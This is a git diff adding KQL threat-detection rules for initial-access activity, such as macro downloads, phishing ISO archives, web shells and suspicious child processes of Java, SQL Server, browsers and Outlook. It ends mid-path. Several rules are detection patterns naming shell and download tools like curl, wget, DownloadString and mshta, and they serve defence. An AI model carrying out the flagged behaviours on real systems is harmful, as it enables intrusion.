--- /dev/null +++ b/KQL/rules/Initial Access/office_macro_file_download.kql @@ -0,0 +1,15 @@ +// Title: Office Macro File Download +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-23 +// Level: low +// Description: Detects the creation of a new office macro files on the system via an application (browser, mail client). +This can help identify potential malicious activity, such as the download of macro-enabled documents that could be used for exploitation. + +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 +// False Positives: +// - Legitimate macro files downloaded from the internet +// - Legitimate macro files sent as attachments via emails + +DeviceFileEvents +| where ((FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm") or (FolderPath contains ".docm:Zone" or FolderPath contains ".dotm:Zone" or FolderPath contains ".xlsm:Zone" or FolderPath contains ".xltm:Zone" or FolderPath contains ".potm:Zone" or FolderPath contains ".pptm:Zone")) and (InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\thunderbird.exe" or InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe") \ No newline at end of file diff --git a/KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql b/KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql new file mode 100644 index 00000000..633e7e3c --- /dev/null +++ b/KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql @@ -0,0 +1,12 @@ +// Title: Phishing Pattern ISO in Archive +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-07 +// Level: high +// Description: Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web) +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566 +// False Positives: +// - Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction + +DeviceProcessEvents +| where (FolderPath endswith "\\isoburn.exe" or FolderPath endswith "\\PowerISO.exe" or FolderPath endswith "\\ImgBurn.exe") and (InitiatingProcessFolderPath endswith "\\Winrar.exe" or InitiatingProcessFolderPath endswith "\\7zFM.exe" or InitiatingProcessFolderPath endswith "\\peazip.exe") \ No newline at end of file diff --git a/KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql b/KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql new file mode 100644 index 00000000..7ab0fb11 --- /dev/null +++ b/KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql @@ -0,0 +1,12 @@ +// Title: Remote Access Tool - ScreenConnect Server Web Shell Execution +// Author: Jason Rathbun (Blackpoint Cyber) +// Date: 2024-02-26 +// Level: high +// Description: Detects potential web shell execution from the ScreenConnect server process. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe" \ No newline at end of file diff --git a/KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql b/KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql new file mode 100644 index 00000000..a78e1886 --- /dev/null +++ b/KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql @@ -0,0 +1,10 @@ +// Title: Running Chrome VPN Extensions via the Registry 2 VPN Extension +// Author: frack113 +// Date: 2021-12-28 +// Level: high +// Description: Running Chrome VPN Extensions via the Registry install 2 vpn extension +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.persistence, attack.t1133 + +DeviceRegistryEvents +| where (RegistryKey contains "Software\\Wow6432Node\\Google\\Chrome\\Extensions" and RegistryKey endswith "update_url") and (RegistryKey contains "fdcgdnkidjaadafnichfpabhfomcebme" or RegistryKey contains "fcfhplploccackoneaefokcmbjfbkenj" or RegistryKey contains "bihmplhobchoageeokmgbdihknkjbknd" or RegistryKey contains "gkojfkhlekighikafcpjkiklfbnlmeio" or RegistryKey contains "jajilbjjinjmgcibalaakngmkilboobh" or RegistryKey contains "gjknjjomckknofjidppipffbpoekiipm" or RegistryKey contains "nabbmpekekjknlbkgpodfndbodhijjem" or RegistryKey contains "kpiecbcckbofpmkkkdibbllpinceiihk" or RegistryKey contains "nlbejmccbhkncgokjcmghpfloaajcffj" or RegistryKey contains "omghfjlpggmjjaagoclmmobgdodcjboh" or RegistryKey contains "bibjcjfmgapbfoljiojpipaooddpkpai" or RegistryKey contains "mpcaainmfjjigeicjnlkdfajbioopjko" or RegistryKey contains "jljopmgdobloagejpohpldgkiellmfnc" or RegistryKey contains "lochiccbgeohimldjooaakjllnafhaid" or RegistryKey contains "nhnfcgpcbfclhfafjlooihdfghaeinfc" or RegistryKey contains "ookhnhpkphagefgdiemllfajmkdkcaim" or RegistryKey contains "namfblliamklmeodpcelkokjbffgmeoo" or RegistryKey contains "nbcojefnccbanplpoffopkoepjmhgdgh" or RegistryKey contains "majdfhpaihoncoakbjgbdhglocklcgno" or RegistryKey contains "lnfdmdhmfbimhhpaeocncdlhiodoblbd" or RegistryKey contains "eppiocemhmnlbhjplcgkofciiegomcon" or RegistryKey contains "cocfojppfigjeefejbpfmedgjbpchcng" or RegistryKey contains "foiopecknacmiihiocgdjgbjokkpkohc" or RegistryKey contains "hhdobjgopfphlmjbmnpglhfcgppchgje" or RegistryKey contains "jgbaghohigdbgbolncodkdlpenhcmcge" or RegistryKey contains "inligpkjkhbpifecbdjhmdpcfhnlelja" or RegistryKey contains "higioemojdadgdbhbbbkfbebbdlfjbip" or RegistryKey contains "hipncndjamdcmphkgngojegjblibadbe" or RegistryKey contains "iolonopooapdagdemdoaihahlfkncfgg" or RegistryKey contains "nhfjkakglbnnpkpldhjmpmmfefifedcj" or RegistryKey contains "jpgljfpmoofbmlieejglhonfofmahini" or RegistryKey contains "fgddmllnllkalaagkghckoinaemmogpe" or RegistryKey contains "ejkaocphofnobjdedneohbbiilggdlbi" or RegistryKey contains "keodbianoliadkoelloecbhllnpiocoi" or RegistryKey contains "hoapmlpnmpaehilehggglehfdlnoegck" or RegistryKey contains "poeojclicodamonabcabmapamjkkmnnk" or RegistryKey contains "dfkdflfgjdajbhocmfjolpjbebdkcjog" or RegistryKey contains "kcdahmgmaagjhocpipbodaokikjkampi" or RegistryKey contains "klnkiajpmpkkkgpgbogmcgfjhdoljacg" or RegistryKey contains "lneaocagcijjdpkcabeanfpdbmapcjjg" or RegistryKey contains "pgfpignfckbloagkfnamnolkeaecfgfh" or RegistryKey contains "jplnlifepflhkbkgonidnobkakhmpnmh" or RegistryKey contains "jliodmnojccaloajphkingdnpljdhdok" or RegistryKey contains "hnmpcagpplmpfojmgmnngilcnanddlhb" or RegistryKey contains "ffbkglfijbcbgblgflchnbphjdllaogb" or RegistryKey contains "kcndmbbelllkmioekdagahekgimemejo" or RegistryKey contains "jdgilggpfmjpbodmhndmhojklgfdlhob" or RegistryKey contains "bihhflimonbpcfagfadcnbbdngpopnjb" or RegistryKey contains "ppajinakbfocjfnijggfndbdmjggcmde" or RegistryKey contains "oofgbpoabipfcfjapgnbbjjaenockbdp" or RegistryKey contains "bhnhkdgoefpmekcgnccpnhjfdgicfebm" or RegistryKey contains "knmmpciebaoojcpjjoeonlcjacjopcpf" or RegistryKey contains "dhadilbmmjiooceioladdphemaliiobo" or RegistryKey contains "jedieiamjmoflcknjdjhpieklepfglin" or RegistryKey contains "mhngpdlhojliikfknhfaglpnddniijfh" or RegistryKey contains "omdakjcmkglenbhjadbccaookpfjihpa" or RegistryKey contains "npgimkapccfidfkfoklhpkgmhgfejhbj" or RegistryKey contains "akeehkgglkmpapdnanoochpfmeghfdln" or RegistryKey contains "gbmdmipapolaohpinhblmcnpmmlgfgje" or RegistryKey contains "aigmfoeogfnljhnofglledbhhfegannp" or RegistryKey contains "cgojmfochfikphincbhokimmmjenhhgk" or RegistryKey contains "ficajfeojakddincjafebjmfiefcmanc" or RegistryKey contains "ifnaibldjfdmaipaddffmgcmekjhiloa" or RegistryKey contains "jbnmpdkcfkochpanomnkhnafobppmccn" or RegistryKey contains "apcfdffemoinopelidncddjbhkiblecc" or RegistryKey contains "mjolnodfokkkaichkcjipfgblbfgojpa" or RegistryKey contains "oifjbnnafapeiknapihcmpeodaeblbkn" or RegistryKey contains "plpmggfglncceinmilojdkiijhmajkjh" or RegistryKey contains "mjnbclmflcpookeapghfhapeffmpodij" or RegistryKey contains "bblcccknbdbplgmdjnnikffefhdlobhp" or RegistryKey contains "aojlhgbkmkahabcmcpifbolnoichfeep" or RegistryKey contains "lcmammnjlbmlbcaniggmlejfjpjagiia" or RegistryKey contains "knajdeaocbpmfghhmijicidfcmdgbdpm" or RegistryKey contains "bdlcnpceagnkjnjlbbbcepohejbheilk" or RegistryKey contains "edknjdjielmpdlnllkdmaghlbpnmjmgb" or RegistryKey contains "eidnihaadmmancegllknfbliaijfmkgo" or RegistryKey contains "ckiahbcmlmkpfiijecbpflfahoimklke" or RegistryKey contains "macdlemfnignjhclfcfichcdhiomgjjb" or RegistryKey contains "chioafkonnhbpajpengbalkececleldf" or RegistryKey contains "amnoibeflfphhplmckdbiajkjaoomgnj" or RegistryKey contains "llbhddikeonkpbhpncnhialfbpnilcnc" or RegistryKey contains "pcienlhnoficegnepejpfiklggkioccm" or RegistryKey contains "iocnglnmfkgfedpcemdflhkchokkfeii" or RegistryKey contains "igahhbkcppaollcjeaaoapkijbnphfhb" or RegistryKey contains "njpmifchgidinihmijhcfpbdmglecdlb" or RegistryKey contains "ggackgngljinccllcmbgnpgpllcjepgc" or RegistryKey contains "kchocjcihdgkoplngjemhpplmmloanja" or RegistryKey contains "bnijmipndnicefcdbhgcjoognndbgkep" or RegistryKey contains "lklekjodgannjcccdlbicoamibgbdnmi" or RegistryKey contains "dbdbnchagbkhknegmhgikkleoogjcfge" or RegistryKey contains "egblhcjfjmbjajhjhpmnlekffgaemgfh" or RegistryKey contains "ehbhfpfdkmhcpaehaooegfdflljcnfec" or RegistryKey contains "bkkgdjpomdnfemhhkalfkogckjdkcjkg" or RegistryKey contains "almalgbpmcfpdaopimbdchdliminoign" or RegistryKey contains "akkbkhnikoeojlhiiomohpdnkhbkhieh" or RegistryKey contains "gbfgfbopcfokdpkdigfmoeaajfmpkbnh" or RegistryKey contains "bniikohfmajhdcffljgfeiklcbgffppl" or RegistryKey contains "lejgfmmlngaigdmmikblappdafcmkndb" or RegistryKey contains "ffhhkmlgedgcliajaedapkdfigdobcif" or RegistryKey contains "gcknhkkoolaabfmlnjonogaaifnjlfnp" or RegistryKey contains "pooljnboifbodgifngpppfklhifechoe" or RegistryKey contains "fjoaledfpmneenckfbpdfhkmimnjocfa" or RegistryKey contains "aakchaleigkohafkfjfjbblobjifikek" or RegistryKey contains "dpplabbmogkhghncfbfdeeokoefdjegm" or RegistryKey contains "padekgcemlokbadohgkifijomclgjgif" or RegistryKey contains "bfidboloedlamgdmenmlbipfnccokknp") \ No newline at end of file diff --git a/KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql b/KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql new file mode 100644 index 00000000..6c1c13cf --- /dev/null +++ b/KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql @@ -0,0 +1,13 @@ +// Title: Shell Process Spawned by Java.EXE +// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali +// Date: 2021-12-17 +// Level: medium +// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation) +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation +// False Positives: +// - Legitimate calls to system binaries +// - Company specific internal usage + +DeviceProcessEvents +| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\java.exe") and (not((ProcessCommandLine contains "build" and InitiatingProcessFolderPath contains "build"))) \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql b/KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql new file mode 100644 index 00000000..4d6b1c5f --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Browser Child Process - MacOS +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-04-05 +// Level: medium +// Description: Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.t1189, attack.t1203, attack.t1059 +// False Positives: +// - Legitimate browser install, update and recovery scripts + +DeviceProcessEvents +| where ((FolderPath endswith "/bash" or FolderPath endswith "/curl" or FolderPath endswith "/dash" or FolderPath endswith "/ksh" or FolderPath endswith "/osascript" or FolderPath endswith "/perl" or FolderPath endswith "/php" or FolderPath endswith "/pwsh" or FolderPath endswith "/python" or FolderPath endswith "/sh" or FolderPath endswith "/tcsh" or FolderPath endswith "/wget" or FolderPath endswith "/zsh") and (InitiatingProcessFolderPath contains "com.apple.WebKit.WebContent" or InitiatingProcessFolderPath contains "firefox" or InitiatingProcessFolderPath contains "Google Chrome Helper" or InitiatingProcessFolderPath contains "Google Chrome" or InitiatingProcessFolderPath contains "Microsoft Edge" or InitiatingProcessFolderPath contains "Opera" or InitiatingProcessFolderPath contains "Safari" or InitiatingProcessFolderPath contains "Tor Browser")) and (not(((((ProcessCommandLine contains "/Volumes/Google Chrome/Google Chrome.app/Contents/Frameworks/" and ProcessCommandLine contains "/Resources/install.sh") or (ProcessCommandLine contains "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/" and ProcessCommandLine contains "/Resources/keystone_promote_preflight.sh") or (ProcessCommandLine contains "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/" and ProcessCommandLine contains "/Resources/keystone_promote_postflight.sh")) and (InitiatingProcessFolderPath contains "Google Chrome Helper" or InitiatingProcessFolderPath contains "Google Chrome")) or ((ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Application Support/Google/Chrome/recovery/" and ProcessCommandLine contains "/ChromeRecovery") and (InitiatingProcessFolderPath contains "Google Chrome Helper" or InitiatingProcessFolderPath contains "Google Chrome")) or ProcessCommandLine contains "--defaults-torrc" or ProcessCommandLine =~ "*/Library/Application Support/Microsoft/MAU*/Microsoft AutoUpdate.app/Contents/MacOS/msupdate*" or ((ProcessCommandLine contains "IOPlatformExpertDevice" or ProcessCommandLine contains "hw.model") and InitiatingProcessFolderPath contains "Microsoft Edge")))) and (not((ProcessCommandLine =~ "" or isnull(ProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql b/KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql new file mode 100644 index 00000000..685c4387 --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Child Process Of SQL Server +// Author: FPT.EagleEye Team, wagga +// Date: 2020-12-11 +// Level: high +// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection. +// MITRE Tactic: Initial Access +// Tags: attack.t1505.003, attack.t1190, attack.initial-access, attack.persistence, attack.privilege-escalation + +DeviceProcessEvents +| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (not((ProcessCommandLine startswith "\"C:\\Windows\\system32\\cmd.exe\" " and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath endswith "DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\"))) \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql b/KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql new file mode 100644 index 00000000..46b851ed --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Child Process Of Veeam Dabatase +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-04 +// Level: critical +// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation + +DeviceProcessEvents +| where (InitiatingProcessCommandLine contains "VEEAMSQL" and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (((ProcessCommandLine contains "-ex " or ProcessCommandLine contains "bypass" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "copy ") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wt.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\whoami.exe")) \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql b/KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql new file mode 100644 index 00000000..f4bcc899 --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Double Extension File Execution +// Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-06-26 +// Level: high +// Description: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains " .exe" or ProcessCommandLine contains "______.exe" or ProcessCommandLine contains ".doc.exe" or ProcessCommandLine contains ".doc.js" or ProcessCommandLine contains ".docx.exe" or ProcessCommandLine contains ".docx.js" or ProcessCommandLine contains ".gif.exe" or ProcessCommandLine contains ".jpeg.exe" or ProcessCommandLine contains ".jpg.exe" or ProcessCommandLine contains ".mkv.exe" or ProcessCommandLine contains ".mov.exe" or ProcessCommandLine contains ".mp3.exe" or ProcessCommandLine contains ".mp4.exe" or ProcessCommandLine contains ".pdf.exe" or ProcessCommandLine contains ".pdf.js" or ProcessCommandLine contains ".png.exe" or ProcessCommandLine contains ".ppt.exe" or ProcessCommandLine contains ".ppt.js" or ProcessCommandLine contains ".pptx.exe" or ProcessCommandLine contains ".pptx.js" or ProcessCommandLine contains ".rtf.exe" or ProcessCommandLine contains ".rtf.js" or ProcessCommandLine contains ".svg.exe" or ProcessCommandLine contains ".txt.exe" or ProcessCommandLine contains ".txt.js" or ProcessCommandLine contains ".xls.exe" or ProcessCommandLine contains ".xls.js" or ProcessCommandLine contains ".xlsx.exe" or ProcessCommandLine contains ".xlsx.js" or ProcessCommandLine contains "⠀⠀⠀⠀⠀⠀.exe") and (FolderPath endswith " .exe" or FolderPath endswith "______.exe" or FolderPath endswith ".doc.exe" or FolderPath endswith ".doc.js" or FolderPath endswith ".docx.exe" or FolderPath endswith ".docx.js" or FolderPath endswith ".gif.exe" or FolderPath endswith ".jpeg.exe" or FolderPath endswith ".jpg.exe" or FolderPath endswith ".mkv.exe" or FolderPath endswith ".mov.exe" or FolderPath endswith ".mp3.exe" or FolderPath endswith ".mp4.exe" or FolderPath endswith ".pdf.exe" or FolderPath endswith ".pdf.js" or FolderPath endswith ".png.exe" or FolderPath endswith ".ppt.exe" or FolderPath endswith ".ppt.js" or FolderPath endswith ".pptx.exe" or FolderPath endswith ".pptx.js" or FolderPath endswith ".rtf.exe" or FolderPath endswith ".rtf.js" or FolderPath endswith ".svg.exe" or FolderPath endswith ".txt.exe" or FolderPath endswith ".txt.js" or FolderPath endswith ".xls.exe" or FolderPath endswith ".xls.js" or FolderPath endswith ".xlsx.exe" or FolderPath endswith ".xlsx.js" or FolderPath endswith "⠀⠀⠀⠀⠀⠀.exe") \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql b/KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql new file mode 100644 index 00000000..c04e9c5a --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Execution From Outlook Temporary Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-01 +// Level: high +// Description: Detects a suspicious program execution in Outlook temp folder +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 + +DeviceProcessEvents +| where FolderPath contains "\\Temporary Internet Files\\Content.Outlook\\" \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql b/KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql new file mode 100644 index 00000000..231e4c26 --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Execution via macOS Script Editor +// Author: Tim Rauch (rule), Elastic (idea) +// Date: 2022-10-21 +// Level: medium +// Description: Detects when the macOS Script Editor utility spawns an unusual child process. +// MITRE Tactic: Initial Access +// Tags: attack.t1566, attack.t1566.002, attack.initial-access, attack.t1059, attack.t1059.002, attack.t1204, attack.t1204.001, attack.execution, attack.persistence, attack.t1553, attack.defense-evasion + +DeviceProcessEvents +| where ((FolderPath endswith "/curl" or FolderPath endswith "/bash" or FolderPath endswith "/sh" or FolderPath endswith "/zsh" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/osascript" or FolderPath endswith "/mktemp" or FolderPath endswith "/chmod" or FolderPath endswith "/php" or FolderPath endswith "/nohup" or FolderPath endswith "/openssl" or FolderPath endswith "/plutil" or FolderPath endswith "/PlistBuddy" or FolderPath endswith "/xattr" or FolderPath endswith "/sqlite" or FolderPath endswith "/funzip" or FolderPath endswith "/popen") or (FolderPath contains "python" or FolderPath contains "perl")) and InitiatingProcessFolderPath endswith "/Script Editor" \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql b/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql new file mode 100644 index 00000000..716880e7 --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql @@ -0,0 +1,14 @@ +// Title: Suspicious File Created in Outlook Temporary Directory +// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-22 +// Level: high +// Description: Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments. +This can be used to detect spear-phishing campaigns that use suspicious files as attachments, which may contain malicious code. + +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 +// False Positives: +// - Opening of headers or footers in email signatures that include SVG images or legitimate SVG attachments + +DeviceFileEvents +| where (FolderPath endswith ".cpl" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".rdp" or FolderPath endswith ".svg" or FolderPath endswith ".vba" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and ((FolderPath contains "\\AppData\\Local\\Packages\\Microsoft.Outlook_" or FolderPath contains "\\AppData\\Local\\Microsoft\\Olk\\Attachments\\") or (FolderPath contains "\\AppData\\Local\\Microsoft\\Windows\\" and FolderPath contains "\\Content.Outlook\\")) \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql b/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql new file mode 100644 index 00000000..983a2cee --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql @@ -0,0 +1,12 @@ +// Title: Suspicious File Write to SharePoint Layouts Directory +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-24 +// Level: high +// Description: Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation. +This behavior has been observed in the exploitation of SharePoint vulnerabilities such as CVE-2025-49704, CVE-2025-49706 or CVE-2025-53770. + +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.persistence, attack.t1505.003 + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath contains "\\15\\TEMPLATE\\LAYOUTS\\" or FolderPath contains "\\16\\TEMPLATE\\LAYOUTS\\") and (FolderPath endswith ".asax" or FolderPath endswith ".ascx" or FolderPath endswith ".ashx" or FolderPath endswith ".asmx" or FolderPath endswith ".asp" or FolderPath endswith ".aspx" or FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cer" or FolderPath endswith ".config" or FolderPath endswith ".hta" or FolderPath endswith ".js" or FolderPath endswith ".jsp" or FolderPath endswith ".jspx" or FolderPath endswith ".php" or FolderPath endswith ".ps1" or FolderPath endswith ".vbs") and (FolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\" or FolderPath startswith "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Web Server Extensions\\") \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql b/KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql new file mode 100644 index 00000000..7ef5fc94 --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql @@ -0,0 +1,10 @@ +// Title: Suspicious HWP Sub Processes +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-24 +// Level: high +// Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001, attack.execution, attack.t1203, attack.t1059.003, attack.g0032 + +DeviceProcessEvents +| where FolderPath endswith "\\gbb.exe" and InitiatingProcessFolderPath endswith "\\Hwp.exe" \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql b/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql new file mode 100644 index 00000000..c0613ed3 --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql @@ -0,0 +1,14 @@ +// Title: Suspicious LNK Command-Line Padding with Whitespace Characters +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-03-19 +// Level: high +// Description: Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D). +Adversaries insert non-printable whitespace characters (e.g., Line Feed \x0A, Carriage Return \x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary. +The hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion—commonly used for social engineering attacks. +This rule flags suspicious use of such padding observed in real-world attacks. + +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.t1204.002 + +DeviceProcessEvents +| where ((ProcessCommandLine contains " " or ProcessCommandLine contains "\\u0009" or ProcessCommandLine contains "\\u000A" or ProcessCommandLine contains "\\u0011" or ProcessCommandLine contains "\\u0012" or ProcessCommandLine contains "\\u0013" or ProcessCommandLine contains "\\u000B" or ProcessCommandLine contains "\\u000C" or ProcessCommandLine contains "\\u000D") or ProcessCommandLine matches regex "\\n\\n\\n\\n\\n\\n") and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessCommandLine contains ".lnk") \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql b/KQL/rules/Initial 